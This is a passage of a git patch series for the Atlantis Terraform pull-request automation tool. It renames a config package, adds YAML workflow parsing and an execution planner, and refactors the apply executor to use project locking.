To do this we can either select and catch // the error or use list and then look for the workspace. Both commands take // the same amount of time so that's why we're running select here. - _, err := p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err := p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "select", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) if err != nil { // If terraform workspace select fails we run terraform workspace // new to create a new workspace automatically. - _, err = p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err = p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) return err } return nil diff --git a/server/events/atlantisyaml/plan_step_test.go b/server/events/repoconfig/plan_step_test.go similarity index 90% rename from server/events/atlantisyaml/plan_step_test.go rename to server/events/repoconfig/plan_step_test.go index d5d7502992..7e9e8b1f22 100644 --- a/server/events/atlantisyaml/plan_step_test.go +++ b/server/events/repoconfig/plan_step_test.go @@ -1,4 +1,4 @@ -package atlantisyaml_test +package repoconfig_test import ( "errors" @@ -9,8 +9,8 @@ import ( "github.com/hashicorp/go-version" . 
"github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events/atlantisyaml" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" "github.com/runatlantis/atlantis/server/logging" @@ -25,18 +25,18 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -61,18 +61,18 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). 
@@ -112,18 +112,18 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -170,18 +170,18 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } // Ensure that we actually try to switch workspaces by making the @@ -212,18 +212,18 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: 
"username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) @@ -247,7 +247,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) { terraform := mocks.NewMockClient() // Create the env/workspace.tfvars file. - tmpDir, cleanup := tmpDir_stepTests(t) + tmpDir, cleanup := TempDir(t) defer cleanup() err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700) Ok(t, err) @@ -258,18 +258,18 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile} From 7dfab213e8d84a1984da7ff75abf26fe55fc71d2 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 5 Jun 2018 17:23:58 +0100 Subject: [PATCH 09/69] Parse config and build execution plan. 
--- server/events/repoconfig/config.go | 188 ++++++++++++++++++ server/events/repoconfig/execution_planner.go | 144 ++++++++++++++ server/events/repoconfig/repoconfig.go | 87 ++++++++ testing/assertions.go | 2 +- 4 files changed, 420 insertions(+), 1 deletion(-) create mode 100644 server/events/repoconfig/config.go create mode 100644 server/events/repoconfig/execution_planner.go create mode 100644 server/events/repoconfig/repoconfig.go diff --git a/server/events/repoconfig/config.go b/server/events/repoconfig/config.go new file mode 100644 index 0000000000..48a0a9e388 --- /dev/null +++ b/server/events/repoconfig/config.go @@ -0,0 +1,188 @@ +package repoconfig + +import "fmt" + +type RepoConfig struct { + Version int `yaml:"version"` + Projects []Project `yaml:"projects"` + Workflows map[string]Workflow `yaml:"workflows"` +} + +type Project struct { + Dir string `yaml:"dir"` + Workspace string `yaml:"workspace"` + Workflow string `yaml:"workflow"` + TerraformVersion string `yaml:"terraform_version"` + AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements"` +} + +func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Project + // Set up defaults. + defaults := alias{ + Workspace: defaultWorkspace, + AutoPlan: &AutoPlan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + } + if err := unmarshal(&defaults); err != nil { + return err + } + *p = Project(defaults) + return nil +} + +type AutoPlan struct { + WhenModified []string `yaml:"when_modified"` + Enabled bool `yaml:"enabled"` // defaults to true +} + +func (a *AutoPlan) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias AutoPlan + // Set up defaults. + defaults := alias{ + // If not specified, we assume it's enabled. 
+ Enabled: true, + } + if err := unmarshal(&defaults); err != nil { + return err + } + *a = AutoPlan(defaults) + return nil +} + +type Workflow struct { + Apply *Stage `yaml:"apply"` // defaults to regular apply steps + Plan *Stage `yaml:"plan"` // defaults to regular plan steps +} + +func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Workflow + var tmp alias + if err := unmarshal(&tmp); err != nil { + return err + } + *p = Workflow(tmp) + + // If plan or apply keys aren't specified we use the default workflow. + if p.Apply == nil { + p.Apply = &Stage{ + []StepConfig{ + { + StepType: "apply", + }, + }, + } + } + + if p.Plan == nil { + p.Plan = &Stage{ + []StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + } + } + + return nil +} + +type Stage struct { + Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' +} + +type StepConfig struct { + StepType string + ExtraArgs []string +} + +func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + var singleString string + err := unmarshal(&singleString) + if err == nil { + if singleString != "init" && singleString != "plan" && singleString != "apply" { + return fmt.Errorf("unsupported step type: %q", singleString) + } + s.StepType = singleString + return nil + } + + // Next, try to unmarshal as a built-in command with extra_args set, ex. + // steps: + // - init: + /// extra_args: ["arg1"] + // + // We need to create a struct for each step so go-yaml knows to call into + // our routine based on the key (ex. init, plan, etc). + // We use a map[string]interface{} as the value so we can manually + // validate key names and return better errors. 
This is instead of: + // Init struct{ + // ExtraArgs []string `yaml:"extra_args"` + // } `yaml:"init"` + + validateBuiltIn := func(stepType string, args map[string]interface{}) error { + s.StepType = stepType + for k, v := range args { + if k != "extra_args" { + return fmt.Errorf("unsupported key %q for step %s – the only supported key is extra_args", k, stepType) + } + + // parse as []string + val, ok := v.([]interface{}) + if !ok { + return fmt.Errorf("expected array of strings as value of extra_args, not %q", v) + } + var finalVals []string + for _, i := range val { + finalVals = append(finalVals, fmt.Sprintf("%s", i)) + } + s.ExtraArgs = finalVals + } + return nil + } + var initStep struct { + Init map[string]interface{} `yaml:"init"` + } + if err = unmarshal(&initStep); err == nil { + return validateBuiltIn("init", initStep.Init) + } + + var planStep struct { + Plan map[string]interface{} `yaml:"plan"` + } + if err = unmarshal(&planStep); err == nil { + return validateBuiltIn("plan", planStep.Plan) + } + + var applyStep struct { + Apply map[string]interface{} `yaml:"apply"` + } + if err = unmarshal(&applyStep); err == nil { + return validateBuiltIn("apply", applyStep.Apply) + } + + // todo: run step + // Try to unmarshal as a custom run step, ex. 
+ // steps: + // - run: my command + //var runStep struct { + // Run string `yaml:"run"` + //} + //if err = unmarshal(&runStep); err == nil { + // + //} + return err +} diff --git a/server/events/repoconfig/execution_planner.go b/server/events/repoconfig/execution_planner.go new file mode 100644 index 0000000000..02cba0496f --- /dev/null +++ b/server/events/repoconfig/execution_planner.go @@ -0,0 +1,144 @@ +package repoconfig + +import ( + "fmt" + "path/filepath" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/logging" +) + +type ExecutionPlanner struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version + ConfigReader *Reader +} + +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + +func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*PlanStage, error) { + defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) + if err != nil { + return nil, err + } + return &PlanStage{ + Steps: steps, + }, nil +} + +func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { + config, err := s.ConfigReader.ReadConfig(repoDir) + if err != nil { + return nil, err + } + + // If there's no config file, use defaults. + if config == nil { + log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename) + return defaults, nil + } + + // Get this project's configuration. 
+ for _, p := range config.Projects { + if p.Dir == relProjectPath && p.Workspace == workspace { + workflowName := p.Workflow + + // If they didn't specify a workflow, use the default. + if workflowName == "" { + log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename) + return defaults, nil + } + + // If they did specify a workflow, find it. + workflow, exists := config.Workflows[workflowName] + if !exists { + return nil, fmt.Errorf("no workflow with key %q defined", workflowName) + } + + // We have a workflow defined, so now we need to build it. + meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + var steps []Step + var stepsConfig []StepConfig + if stageName == PlanStageName { + stepsConfig = workflow.Plan.Steps + } else { + stepsConfig = workflow.Apply.Steps + } + for _, stepConfig := range stepsConfig { + var step Step + switch stepConfig.StepType { + case "init": + step = &InitStep{ + Meta: meta, + ExtraArgs: stepConfig.ExtraArgs, + } + case "plan": + step = &PlanStep{ + Meta: meta, + ExtraArgs: stepConfig.ExtraArgs, + } + case "apply": + step = &ApplyStep{ + Meta: meta, + ExtraArgs: stepConfig.ExtraArgs, + } + } + // todo: custom step + steps = append(steps, step) + } + return steps, nil + } + } + return nil, fmt.Errorf("no project with dir %q and workspace %q defined", relProjectPath, workspace) +} + +func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { + defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) + if err != nil { + return nil, err + } + return &ApplyStage{ + Steps: steps, + }, nil +} + +func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace 
string, relProjectPath string, extraCommentArgs []string, username string) StepMeta { + return StepMeta{ + Log: log, + Workspace: workspace, + AbsolutePath: filepath.Join(repoDir, relProjectPath), + DirRelativeToRepoRoot: relProjectPath, + // If there's no config then we should use the default tf version. + TerraformVersion: s.DefaultTFVersion, + TerraformExecutor: s.TerraformExecutor, + ExtraCommentArgs: extraCommentArgs, + Username: username, + } +} + +func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { + meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + return []Step{ + &InitStep{ + ExtraArgs: nil, + Meta: meta, + }, + &PlanStep{ + ExtraArgs: nil, + Meta: meta, + }, + } +} +func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { + meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + return []Step{ + &ApplyStep{ + ExtraArgs: nil, + Meta: meta, + }, + } +} diff --git a/server/events/repoconfig/repoconfig.go b/server/events/repoconfig/repoconfig.go new file mode 100644 index 0000000000..6d71d7de0d --- /dev/null +++ b/server/events/repoconfig/repoconfig.go @@ -0,0 +1,87 @@ +package repoconfig + +import ( + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/logging" +) + +type ApplyRequirement interface { + // IsMet returns true if the requirement is met and false if not. + // If it returns false, it also returns a string describing why not. 
+ IsMet() (bool, string) +} + +type PlanStage struct { + Steps []Step +} + +type ApplyStage struct { + Steps []Step + ApplyRequirements []ApplyRequirement +} + +func (p PlanStage) Run() (string, error) { + var outputs string + for _, step := range p.Steps { + out, err := step.Run() + if err != nil { + return outputs, err + } + if out != "" { + // Outputs are separated by newlines. + outputs += "\n" + out + } + } + return outputs, nil +} + +func (a ApplyStage) Run() (string, error) { + var outputs string + for _, step := range a.Steps { + out, err := step.Run() + if err != nil { + return outputs, err + } + if out != "" { + // Outputs are separated by newlines. + outputs += "\n" + out + } + } + return outputs, nil +} + +type Step interface { + // Run runs the step. It returns any output that needs to be commented back + // onto the pull request and error. + Run() (string, error) +} + +// StepMeta is the data that is available to all steps. +type StepMeta struct { + Log *logging.SimpleLogger + Workspace string + // AbsolutePath is the path to this project on disk. It's not necessarily + // the repository root since a project can be in a subdir of the root. + AbsolutePath string + // DirRelativeToRepoRoot is the directory for this project relative + // to the repo root. + DirRelativeToRepoRoot string + TerraformVersion *version.Version + TerraformExecutor TerraformExec + // ExtraCommentArgs are the arguments that may have been appended to the comment. + // For example 'atlantis plan -- -target=resource'. They are already quoted + // further up the call tree to mitigate security issues. + ExtraCommentArgs []string + // VCS username of who caused this step to be executed. For example the + // commenter, or who pushed a new commit. + Username string +} + +// MustConstraint returns a constraint. It panics on error. 
+func MustConstraint(constraint string) version.Constraints { + c, err := version.NewConstraint(constraint) + if err != nil { + panic(err) + } + return c +} diff --git a/testing/assertions.go b/testing/assertions.go index efb2ce9b14..5b6ad147bd 100644 --- a/testing/assertions.go +++ b/testing/assertions.go @@ -73,7 +73,7 @@ func ErrContains(tb testing.TB, substr string, act error) { tb.Fatalf("exp err to contain %q but err was nil", substr) } if !strings.Contains(act.Error(), substr) { - tb.Fatalf("exp err %q to contain $q", act.Error(), substr) + tb.Fatalf("exp err %q to contain %q", act.Error(), substr) } } From 2175b50472f3ec788dcfc4e7f51e98b27309cc30 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 5 Jun 2018 18:54:49 +0100 Subject: [PATCH 10/69] Use new steps in plan/apply - Fix lockURL issues by adding new Router object. - Use new ProjectLocker and delete PreProjectExecutor. --- server/events/apply_executor.go | 125 +++----- server/events/command_handler.go | 6 - .../mocks/matchers/events_preexecuteresult.go | 20 -- .../events/mocks/mock_lock_url_generator.go | 35 ++- .../events/mocks/mock_project_pre_executor.go | 85 ------ server/events/plan_executor.go | 117 ++------ server/events/plan_executor_test.go | 3 - server/events/project_locker.go | 87 ++++++ server/events/project_locker_test.go | 269 +++++++++++++++++ server/events/project_pre_execute.go | 140 --------- server/events/project_pre_execute_test.go | 282 ------------------ server/router.go | 31 ++ server/server.go | 60 ++-- server/server_test.go | 2 +- 14 files changed, 509 insertions(+), 753 deletions(-) delete mode 100644 server/events/mocks/matchers/events_preexecuteresult.go delete mode 100644 server/events/mocks/mock_project_pre_executor.go create mode 100644 server/events/project_locker.go create mode 100644 server/events/project_locker_test.go delete mode 100644 server/events/project_pre_execute.go delete mode 100644 server/events/project_pre_execute_test.go create mode 100644 
server/router.go diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index 0ca0dc044f..534546997d 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -14,12 +14,8 @@ package events import ( - "fmt" - "os" - "path/filepath" - - "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" @@ -33,22 +29,23 @@ type ApplyExecutor struct { RequireApproval bool Run *run.Run AtlantisWorkspace AtlantisWorkspace - ProjectPreExecute *DefaultProjectPreExecutor + ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender + ExecutionPlanner *repoconfig.ExecutionPlanner } // Execute executes apply for the ctx. func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse { - if a.RequireApproval { - approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")} - } - if !approved { - return CommandResponse{Failure: "Pull request must be approved before running apply."} - } - ctx.Log.Info("confirmed pull request was approved") - } + //if a.RequireApproval { + // approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull) + // if err != nil { + // return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")} + // } + // if !approved { + // return CommandResponse{Failure: "Pull request must be approved before running apply."} + // } + // ctx.Log.Info("confirmed pull request was approved") + //} repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) if err != nil { @@ -56,78 +53,33 @@ func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse { } ctx.Log.Info("found workspace in 
%q", repoDir) - // Plans are stored at project roots by their workspace names. We just - // need to find them. - var plans []models.Plan - // If they didn't specify a directory, we apply all plans we can find for - // this workspace. - if ctx.Command.Dir == "" { - err = filepath.Walk(repoDir, func(path string, info os.FileInfo, err error) error { - if err != nil { - return err - } - // Check if the plan is for the right workspace, - if !info.IsDir() && info.Name() == ctx.Command.Workspace+".tfplan" { - rel, _ := filepath.Rel(repoDir, filepath.Dir(path)) - plans = append(plans, models.Plan{ - Project: models.NewProject(ctx.BaseRepo.FullName, rel), - LocalPath: path, - }) - } - return nil - }) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "finding plans")} - } - } else { - // If they did specify a dir, we apply just the plan in that directory - // for this workspace. - planPath := filepath.Join(repoDir, ctx.Command.Dir, ctx.Command.Workspace+".tfplan") - stat, err := os.Stat(planPath) - if err != nil || stat.IsDir() { - return CommandResponse{Error: fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.Command.Dir, ctx.Command.Workspace)} - } - relProjectPath, _ := filepath.Rel(repoDir, filepath.Dir(planPath)) - plans = append(plans, models.Plan{ - Project: models.NewProject(ctx.BaseRepo.FullName, relProjectPath), - LocalPath: planPath, - }) - } - if len(plans) == 0 { - return CommandResponse{Failure: "No plans found for that workspace."} - } - var paths []string - for _, p := range plans { - paths = append(paths, p.LocalPath) + stage, err := a.ExecutionPlanner.BuildApplyStage(ctx.Log, repoDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) + if err != nil { + return CommandResponse{Error: err} } - ctx.Log.Info("found %d plan(s) in our workspace: %v", len(plans), paths) - var results []ProjectResult - for _, plan := range plans { - ctx.Log.Info("running apply for project at path %q", 
plan.Project.Path) - result := a.apply(ctx, repoDir, plan) - result.Path = plan.LocalPath - results = append(results, result) + // check if we have the lock + tryLockResponse, err := a.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) + if err != nil { + return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} + } + if !tryLockResponse.LockAcquired { + return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} } - return CommandResponse{ProjectResults: results} -} -func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.Plan) ProjectResult { - preExecute := a.ProjectPreExecute.Execute(ctx, repoDir, plan.Project) - if preExecute.ProjectResult != (ProjectResult{}) { - return preExecute.ProjectResult + // Check apply requirements. + for _, req := range stage.ApplyRequirements { + isMet, reason := req.IsMet() + if !isMet { + return CommandResponse{Failure: reason} + } } - config := preExecute.ProjectConfig - terraformVersion := preExecute.TerraformVersion - applyExtraArgs := config.GetExtraArguments(ctx.Command.Name.String()) - absolutePath := filepath.Join(repoDir, plan.Project.Path) - workspace := ctx.Command.Workspace - tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, applyExtraArgs...), ctx.Command.Flags...), plan.LocalPath) - output, err := a.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, tfApplyCmd, terraformVersion, workspace) + out, err := stage.Run() + // Send webhooks even if there's an error. 
a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck - Workspace: workspace, + Workspace: ctx.Command.Workspace, User: ctx.User, Repo: ctx.BaseRepo, Pull: ctx.Pull, @@ -135,16 +87,7 @@ func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.P }) if err != nil { - return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)} + return CommandResponse{Error: err} } - ctx.Log.Info("apply succeeded") - - if len(config.PostApply) > 0 { - _, err := a.Run.Execute(ctx.Log, config.PostApply, absolutePath, workspace, terraformVersion, "post_apply") - if err != nil { - return ProjectResult{Error: errors.Wrap(err, "running post apply commands")} - } - } - - return ProjectResult{ApplySuccess: output} + return CommandResponse{ProjectResults: []ProjectResult{{ApplySuccess: out}}} } diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 52dd2090bd..047d5f936a 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -55,7 +55,6 @@ type GitlabMergeRequestGetter interface { type CommandHandler struct { PlanExecutor Executor ApplyExecutor Executor - LockURLGenerator LockURLGenerator VCSClient vcs.ClientProxy GithubPullGetter GithubPullGetter GitlabMergeRequestGetter GitlabMergeRequestGetter @@ -137,11 +136,6 @@ func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging. return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel()) } -// SetLockURL sets a function that's used to return the URL for a lock. 
-func (c *CommandHandler) SetLockURL(f func(id string) (url string)) { - c.LockURLGenerator.SetLockURL(f) -} - func (c *CommandHandler) run(ctx *CommandContext) { log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num) ctx.Log = log diff --git a/server/events/mocks/matchers/events_preexecuteresult.go b/server/events/mocks/matchers/events_preexecuteresult.go deleted file mode 100644 index b8be09b1a2..0000000000 --- a/server/events/mocks/matchers/events_preexecuteresult.go +++ /dev/null @@ -1,20 +0,0 @@ -package matchers - -import ( - "reflect" - - "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -func AnyEventsPreExecuteResult() events.PreExecuteResult { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.PreExecuteResult))(nil)).Elem())) - var nullValue events.PreExecuteResult - return nullValue -} - -func EqEventsPreExecuteResult(value events.PreExecuteResult) events.PreExecuteResult { - pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue events.PreExecuteResult - return nullValue -} diff --git a/server/events/mocks/mock_lock_url_generator.go b/server/events/mocks/mock_lock_url_generator.go index 0a31fc85f8..8a62a2c3b2 100644 --- a/server/events/mocks/mock_lock_url_generator.go +++ b/server/events/mocks/mock_lock_url_generator.go @@ -17,9 +17,16 @@ func NewMockLockURLGenerator() *MockLockURLGenerator { return &MockLockURLGenerator{fail: pegomock.GlobalFailHandler} } -func (mock *MockLockURLGenerator) SetLockURL(_param0 func(string) string) { - params := []pegomock.Param{_param0} - pegomock.GetGenericMockFrom(mock).Invoke("SetLockURL", params, []reflect.Type{}) +func (mock *MockLockURLGenerator) GenerateLockURL(lockID string) string { + params := []pegomock.Param{lockID} + result := pegomock.GetGenericMockFrom(mock).Invoke("GenerateLockURL", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem()}) + var ret0 string + if len(result) != 0 { + if result[0] != nil { + 
ret0 = result[0].(string) + } + } + return ret0 } func (mock *MockLockURLGenerator) VerifyWasCalledOnce() *VerifierLockURLGenerator { @@ -40,28 +47,28 @@ type VerifierLockURLGenerator struct { inOrderContext *pegomock.InOrderContext } -func (verifier *VerifierLockURLGenerator) SetLockURL(_param0 func(string) string) *LockURLGenerator_SetLockURL_OngoingVerification { - params := []pegomock.Param{_param0} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "SetLockURL", params) - return &LockURLGenerator_SetLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +func (verifier *VerifierLockURLGenerator) GenerateLockURL(lockID string) *LockURLGenerator_GenerateLockURL_OngoingVerification { + params := []pegomock.Param{lockID} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GenerateLockURL", params) + return &LockURLGenerator_GenerateLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } -type LockURLGenerator_SetLockURL_OngoingVerification struct { +type LockURLGenerator_GenerateLockURL_OngoingVerification struct { mock *MockLockURLGenerator methodInvocations []pegomock.MethodInvocation } -func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetCapturedArguments() func(string) string { - _param0 := c.GetAllCapturedArguments() - return _param0[len(_param0)-1] +func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetCapturedArguments() string { + lockID := c.GetAllCapturedArguments() + return lockID[len(lockID)-1] } -func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []func(string) string) { +func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []string) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if 
